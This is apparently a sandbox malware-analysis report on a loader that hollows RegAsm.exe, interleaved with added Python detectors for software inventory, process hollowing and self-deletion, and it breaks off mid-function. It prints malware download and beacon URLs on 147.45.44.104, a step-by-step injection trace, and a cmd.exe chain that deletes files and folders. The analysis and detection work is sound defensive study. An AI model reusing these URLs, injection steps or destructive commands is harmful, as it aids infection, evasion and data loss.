regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Excel MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft PowerPoint MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Publisher MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Outlook MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Word MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - English
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Outils de vérification linguistique 2013 de Microsoft Office - Français
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - Español
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft InfoPath MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft DCF MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft OneNote MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Groove MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM UX MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Lync MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Acrobat Reader DC MUI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
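The run of RegQueryValueExA calls above reads DisplayName from every subkey under HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall, i.e. it builds an inventory of installed software, a routine entry in stealer victim logs. One such read is ordinary; DisplayName from dozens of products by one process in one run is the signal. The following Python is an added example, not part of the ZeroBOX report or of the sample: it groups Uninstall\*\DisplayName reads per process and flags any process above a threshold. The sample events are constructed from the subkeys listed above; the report does not name the process that issued these queries, so PID 2156 is assumed, and a second process with a single read is included as a control.

```python
"""Flag installed-software inventory via the Uninstall registry keys.

Each installed product has a subkey under
HKLM\\SOFTWARE\\(Wow6432Node\\)Microsoft\\Windows\\CurrentVersion\\Uninstall
whose DisplayName is what "Programs and Features" shows. Reading one is
ordinary; reading DisplayName from many of them in one run is an inventory
pass of the kind stealers write into their victim logs.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set

# Any hive, with or without the Wow6432Node view (32-bit installs on 64-bit Windows).
UNINSTALL_RE = re.compile(
    r"^(?P<hive>HKEY_[A-Z_]+)\\SOFTWARE\\(?:Wow6432Node\\)?"
    r"Microsoft\\Windows\\CurrentVersion\\Uninstall\\(?P<product>[^\\]+)\\(?P<value>[^\\]+)$",
    re.IGNORECASE,
)


def inventory_reads(events: List[dict]) -> Dict[int, Set[str]]:
    """pid -> set of Uninstall subkeys whose DisplayName that process read."""
    per_pid: Dict[int, Set[str]] = defaultdict(set)
    for ev in events:
        if ev["api"] not in ("RegQueryValueExA", "RegQueryValueExW"):
            continue
        m = UNINSTALL_RE.match(ev["regkey"])
        if m and m.group("value").lower() == "displayname":
            per_pid[ev["pid"]].add(m.group("product"))
    return per_pid


def flag_inventory(events: List[dict], threshold: int = 10) -> Dict[int, List[str]]:
    """Processes that read DisplayName from at least `threshold` distinct products."""
    return {pid: sorted(products)
            for pid, products in inventory_reads(events).items()
            if len(products) >= threshold}


UNINSTALL_WOW = r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall"
# Subkeys taken from the RegQueryValueExA calls in this report. The report does not
# name the querying process, so PID 2156 is an assumption made for the example.
INVENTORIED_SUBKEYS = [
    "7-Zip", "Adobe AIR", "EditPlus", "Google Chrome", "Haansoft HWord 80 Korean",
    "Mozilla Thunderbird 78.4.0 (x86 ko)", "Office15.PROPLUSR",
    "{00203668-8170-44A0-BE44-B632FA4D780F}", "{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}",
    "{26A24AE4-039D-4CA4-87B4-2F32180131F0}", "{4A03706F-666A-4037-7777-5F2748764D10}",
    "{939659F3-71D2-461F-B24D-91D05A4389B4}",
]
SAMPLE_EVENTS = [
    {"api": "RegQueryValueExA", "pid": 2156, "regkey": UNINSTALL_WOW + "\\" + p + "\\DisplayName"}
    for p in INVENTORIED_SUBKEYS
] + [
    # Constructed controls: a non-DisplayName read, and a single read by an unrelated process.
    {"api": "RegQueryValueExA", "pid": 2156, "regkey": UNINSTALL_WOW + r"\7-Zip\UninstallString"},
    {"api": "RegQueryValueExW", "pid": 3000,
     "regkey": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName"},
]

if __name__ == "__main__":
    for pid, products in flag_inventory(SAMPLE_EVENTS).items():
        print(f"pid {pid} inventoried {len(products)} products: {products}")
```

Thresholds are environment-specific: inventory agents, installers and update helpers legitimately walk these keys, so filter on the process image as well, and cover HKEY_CURRENT_USER (per-user installs) and both registry views, which the pattern above already accepts.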
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
process RegAsm.exe useragent IP Fetcher
process RegAsm.exe useragent File Downloader
process RegAsm.exe useragent IP Sender
process RegAsm.exe useragent
process RegAsm.exe useragent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
Process injection Process 1440 called NtSetContextThread to modify thread in remote process 2156
Process injection Process 2308 called NtSetContextThread to modify thread in remote process 2400
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2005598660
registers.esp: 2750904
registers.edi: 0
registers.eax: 4207877
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 2156
1 0 0

NtSetContextThread

registers.eip: 2005598660
registers.esp: 2686712
registers.edi: 0
registers.eax: 4292580
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000204
process_identifier: 2400
1 0 0
url http://147.45.44.104/get.php?ip=
url http://147.45.44.104/prog/66e7dde32d7a4_vdsfg.exe
Process injection Process 1440 resumed a thread in remote process 2156
Process injection Process 2308 resumed a thread in remote process 2400
Process injection Process 2400 resumed a thread in remote process 2884
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000200
suspend_count: 1
process_identifier: 2156
1 0 0

NtResumeThread

thread_handle: 0x00000204
suspend_count: 1
process_identifier: 2400
1 0 0

NtResumeThread

thread_handle: 0x00000324
suspend_count: 1
process_identifier: 2884
1 0 0
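The injection signatures above (NtSetContextThread and NtResumeThread against PIDs 2156 and 2400, after WriteProcessMemory into 0x00400000 and 0x7efde008) are the tail of a RunPE / process-hollowing chain that the full trace below spells out call by call: RegAsm.exe is created with CREATE_SUSPENDED, an RWX region is allocated at 0x00400000, a PE image is written header and sections, four bytes are written at 0x7efde008 (registers.ebx is 2130567168 = 0x7efde000, the PEB, so this is PEB->ImageBaseAddress; the "@" is 0x40 from the little-endian 0x00400000), the thread context is set with EAX at the payload's entry point, and the thread is resumed. The following Python is an added example, not part of the ZeroBOX report or of the sample: it reconstructs that chain from an ordered list of API events using the report's own argument names (process_identifier, base_address, protection, registers, thread_handle). The events are constructed to mirror PID 2156's sequence; the MZ header bytes stand in for the real buffers, and the cmd.exe launch from later in the trace is included as a control because it is also CREATE_SUSPENDED and resumed but never receives a payload.

```python
"""Reconstruct a RunPE / process-hollowing chain from ordered sandbox API events.

Stages, per suspended child: CREATE_SUSPENDED create -> RWX allocation -> PE
image written into it -> PEB->ImageBaseAddress (PEB+8 on 32-bit) patched to the
new base -> NtSetContextThread with EAX (entry point of a fresh suspended
thread) inside the written image -> NtResumeThread on that thread.
"""
import struct
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

CREATE_SUSPENDED = 0x00000004
PAGE_EXECUTE_READWRITE = 0x40
PEB_IMAGE_BASE_OFFSET = 8  # offset of ImageBaseAddress in the 32-bit PEB


@dataclass
class Target:
    pid: int
    thread_handle: int
    host_image: str
    rwx_regions: List[Tuple[int, int]] = field(default_factory=list)  # (base, size)
    pe_base: Optional[int] = None
    entry_point: Optional[int] = None
    peb: Optional[int] = None
    resumed: bool = False
    other_writes: Dict[int, bytes] = field(default_factory=dict)  # non-MZ writes by address

    def in_rwx_region(self, addr: int) -> bool:
        return any(base <= addr < base + size for base, size in self.rwx_regions)

    def finding(self) -> Optional[dict]:
        stages = ["suspended_create"]
        if self.rwx_regions:
            stages.append("rwx_alloc")
        if self.pe_base is not None:
            stages.append("pe_image_written")
            if self.peb is not None:
                patch = self.other_writes.get(self.peb + PEB_IMAGE_BASE_OFFSET, b"")
                if len(patch) >= 4 and struct.unpack("<I", patch[:4])[0] == self.pe_base:
                    stages.append("peb_imagebase_patched")
        if self.entry_point is not None and self.in_rwx_region(self.entry_point):
            stages.append("entry_point_in_written_image")
        if self.resumed:
            stages.append("thread_resumed")
        # A suspended start that never receives an image, or is never resumed, is not hollowing.
        if self.pe_base is None or not self.resumed:
            return None
        return {"pid": self.pid, "host": self.host_image, "pe_base": self.pe_base,
                "entry_point": self.entry_point, "stages": stages}


def detect_hollowing(events: List[dict]) -> List[dict]:
    """events: ordered dicts {'api': name, 'args': {...}} using the report's argument names."""
    targets: Dict[int, Target] = {}
    for ev in events:
        api, a = ev["api"], ev["args"]
        if api == "CreateProcessInternalW":
            if a["creation_flags"] & CREATE_SUSPENDED:
                targets[a["process_identifier"]] = Target(a["process_identifier"], a["thread_handle"], a["filepath"])
            continue
        t = targets.get(a.get("process_identifier"))
        if t is None:
            continue  # call did not target a suspended child we are tracking
        if api == "NtAllocateVirtualMemory" and a["protection"] == PAGE_EXECUTE_READWRITE:
            t.rwx_regions.append((a["base_address"], a["region_size"]))
        elif api == "WriteProcessMemory":
            if a["buffer"][:2] == b"MZ" and t.in_rwx_region(a["base_address"]):
                t.pe_base = a["base_address"]
            else:
                t.other_writes[a["base_address"]] = a["buffer"]
        elif api == "NtSetContextThread" and a["thread_handle"] == t.thread_handle:
            t.entry_point = a["registers"]["eax"]
            t.peb = a["registers"]["ebx"]
        elif api == "NtResumeThread" and a["thread_handle"] == t.thread_handle:
            t.resumed = True
    return [f for f in (t.finding() for t in targets.values()) if f]


REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
# Constructed from the PID 2156 sequence in this report; header bytes are stand-ins.
SAMPLE_EVENTS = [
    {"api": "CreateProcessInternalW", "args": {"process_identifier": 2156, "thread_handle": 0x200,
                                              "filepath": REGASM, "creation_flags": 4}},
    {"api": "NtGetContextThread", "args": {"thread_handle": 0x200}},
    {"api": "NtAllocateVirtualMemory", "args": {"process_identifier": 2156, "base_address": 0x400000,
                                                "region_size": 135168, "protection": 64}},
    {"api": "WriteProcessMemory", "args": {"process_identifier": 2156, "base_address": 0x400000,
                                           "buffer": b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56}},
    {"api": "WriteProcessMemory", "args": {"process_identifier": 2156, "base_address": 0x401000,
                                           "buffer": b"\x00" * 64}},
    {"api": "WriteProcessMemory", "args": {"process_identifier": 2156, "base_address": 0x7EFDE008,
                                           "buffer": struct.pack("<I", 0x400000)}},  # the 4-byte "@" write
    {"api": "NtSetContextThread", "args": {"process_identifier": 2156, "thread_handle": 0x200,
                                           "registers": {"eip": 2005598660, "eax": 4207877, "ebx": 2130567168}}},
    {"api": "NtResumeThread", "args": {"process_identifier": 2156, "thread_handle": 0x200}},
    # Control: cmd.exe is created suspended and resumed, but nothing is written into it.
    {"api": "CreateProcessInternalW", "args": {"process_identifier": 2884, "thread_handle": 0x324,
                                              "filepath": r"C:\Windows\System32\cmd.exe", "creation_flags": 67634196}},
    {"api": "NtResumeThread", "args": {"process_identifier": 2884, "thread_handle": 0x324}},
]

if __name__ == "__main__":
    for f in detect_hollowing(SAMPLE_EVENTS):
        print(f"pid {f['pid']} ({f['host']}): image at {f['pe_base']:#x}, entry {f['entry_point']:#x}, {f['stages']}")
```

Keying on the child PID alone is enough for one report; on a live endpoint key on (parent PID, child PID), since handle values such as 0x204 recur across processes. Some loaders call NtUnmapViewOfSection before the allocation or map a section instead of calling WriteProcessMemory; the detector above keys on the writes and the thread-context change, which survive the first variation but would need a mapping stage for the second.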
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 1440
1 0 0

NtResumeThread

thread_handle: 0x00000158
suspend_count: 1
process_identifier: 1440
1 0 0

NtResumeThread

thread_handle: 0x00000194
suspend_count: 1
process_identifier: 1440
1 0 0

CreateProcessInternalW

thread_identifier: 2160
thread_handle: 0x00000200
process_identifier: 2156
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000204
1 1 0

NtGetContextThread

thread_handle: 0x00000200
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 135168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000204
1 0 0

WriteProcessMemory

buffer: MZ…This program cannot be run in DOS mode.…Rich…PELûÞçf… .text .rdata .data .rsrc .reloc [PE image header of the injected executable; non-printable bytes omitted]
base_address: 0x00400000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00405000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer: ÿÿÿÿNæ@»±¿DüQ@.?AVbad_alloc@std@@üQ@.?AVbad_cast@std@@üQ@.?AVexception@std@@üQ@.?AVbad_array_new_length@std@@üQ@.?AVtype_info@@üQ@.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@üQ@.?AVios_base@std@@üQ@.?AV?$_Iosb@H@std@@üQ@.?AV?$basic_ofstream@DU?$char_traits@D@std@@@std@@üQ@.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@üQ@.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@üQ@.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
base_address: 0x00407000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00408000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer: [binary relocation-table data: runs of 0x3xxx IMAGE_REL_BASED_HIGHLOW entries that render as the characters '0'..'?'; not printable, omitted]
base_address: 0x00420000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2156
process_handle: 0x00000204
1 1 0

NtSetContextThread

registers.eip: 2005598660
registers.esp: 2750904
registers.edi: 0
registers.eax: 4207877
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 2156
1 0 0

NtResumeThread

thread_handle: 0x00000200
suspend_count: 1
process_identifier: 2156
1 0 0

NtGetContextThread

thread_handle: 0x00000158
1 0 0

NtGetContextThread

thread_handle: 0x00000158
1 0 0

NtResumeThread

thread_handle: 0x00000158
suspend_count: 1
process_identifier: 1440
1 0 0

CreateProcessInternalW

thread_identifier: 2312
thread_handle: 0x000003d0
process_identifier: 2308
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003d4
1 1 0

NtResumeThread

thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 2308
1 0 0

NtResumeThread

thread_handle: 0x00000154
suspend_count: 1
process_identifier: 2308
1 0 0

NtResumeThread

thread_handle: 0x000001e0
suspend_count: 1
process_identifier: 2308
1 0 0

CreateProcessInternalW

thread_identifier: 2404
thread_handle: 0x00000204
process_identifier: 2400
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000208
1 1 0

NtGetContextThread

thread_handle: 0x00000204
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 2453504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000208
1 0 0

WriteProcessMemory

buffer: MZ…This program cannot be run in DOS mode.…Rich…PEL™äf… .text .rdata .data .rsrc .reloc [PE image header of the injected executable; non-printable bytes omitted]
base_address: 0x00400000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0042f000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0043c000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

buffer: <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> </assembly> PADDINGXXPADDING… [resource section: empty application manifest followed by linker padding; leading non-printable bytes omitted]
base_address: 0x00651000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00652000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2400
process_handle: 0x00000208
1 1 0

NtSetContextThread

registers.eip: 2005598660
registers.esp: 2686712
registers.edi: 0
registers.eax: 4292580
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000204
process_identifier: 2400
1 0 0

NtResumeThread

thread_handle: 0x00000204
suspend_count: 1
process_identifier: 2400
1 0 0

CreateProcessInternalW

thread_identifier: 2888
thread_handle: 0x00000324
process_identifier: 2884
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000031c
1 1 0

NtResumeThread

thread_handle: 0x00000324
suspend_count: 1
process_identifier: 2884
1 0 0

CreateProcessInternalW

thread_identifier: 2984
thread_handle: 0x00000084
process_identifier: 2980
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\timeout.exe
track: 1
command_line: timeout /t 10
filepath_r: C:\Windows\system32\timeout.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
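The last CreateProcessInternalW entries show the hollowed RegAsm.exe (PID 2400) spawning cmd.exe with `timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit`, a delayed clean-up routine. Two details matter for triage: the delay through timeout.exe lets the parent exit before the delete, and the file deleted is the parent's own image. A payload running from its own dropped file would remove that file; here the payload lives inside RegAsm.exe, so the target is a system binary under C:\Windows and the delete fails without elevated rights, but the pattern is the indicator regardless. The following Python is an added example, not part of the ZeroBOX report or of the sample: it splits the cmd.exe chain on unquoted `&`, extracts the delay, deleted files and removed directories, and compares the deleted path with the parent's image path. The command line is the one from the report; the parent image path passed in and the benign control line are constructed.

```python
"""Parse a cmd.exe /c chain for a delayed self-delete of the form
    timeout /t N (or ping -n N ...) & del /f /q "<exe>" & rd /s /q "<dir>" & exit
and decide whether the deleted file is the launching process's own image.
"""
import re
from typing import List, Optional

CMD_PREFIX_RE = re.compile(r'^\s*"?[^"]*?\bcmd(?:\.exe)?"?\s+/[ck]\s+', re.IGNORECASE)
TIMEOUT_RE = re.compile(r"^timeout(?:\.exe)?\s+(?:/t\s+)?(\d+)", re.IGNORECASE)
PING_RE = re.compile(r"^ping(?:\.exe)?\s+.*?-n\s+(\d+)", re.IGNORECASE)
DEL_RE = re.compile(r'^(?:del|erase)\s+(?:/\w\s+)*"?(.+?)"?\s*$', re.IGNORECASE)
RD_RE = re.compile(r'^(?:rd|rmdir)\s+(?:/\w\s+)*"?(.+?)"?\s*$', re.IGNORECASE)


def split_chain(command_line: str) -> List[str]:
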